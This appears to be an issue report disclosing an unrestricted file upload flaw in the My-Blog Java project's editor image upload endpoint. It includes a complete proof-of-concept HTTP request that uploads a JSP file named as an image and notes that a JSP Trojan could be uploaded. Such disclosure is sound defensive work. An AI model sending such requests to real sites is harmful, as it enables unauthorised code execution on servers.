Open
Description
Source code name:My-Blog
Source code version:1.0
Source code download link:https://github.com/ZHENFENG13/My-Blog/archive/refs/heads/master.zip
Deployment precautions:
Before starting the project, it is necessary to open
src/main/java/com/site/blog/my/core/config/Constants.java
Change the file line upload path to your own absolute path
D:\XXX\My-Blog-master\src\main\resources\static\upload\
Code Audit:
In src/main/java/com/site/blog/my/core/controller/admin/BlogController.java, the uploadFileByEditomd method does not restrict the uploaded files
Vulnerability exploitation:
upload pictures
Corresponding data packet:
POST /admin/blogs/md/uploadfile?guid=1735205098420 HTTP/1.1
Host: 192.168.0.102:28083
Content-Length: 224
Cache-Control: max-age=0
Origin: http://192.168.0.102:28083
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrBk4QTGbN2cvOaPC
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.102:28083/admin/blogs/edit/4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E9CBB3A8B72CDBF558ECAED51B5F892F
Connection: close
------WebKitFormBoundaryrBk4QTGbN2cvOaPC
Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.jsp"
Content-Type: image/jpeg
<% out.println("test"); %>
------WebKitFormBoundaryrBk4QTGbN2cvOaPC--
Can upload JSP Trojan horse
You can also upload HTML
Metadata
Metadata
Assignees
Labels
No labels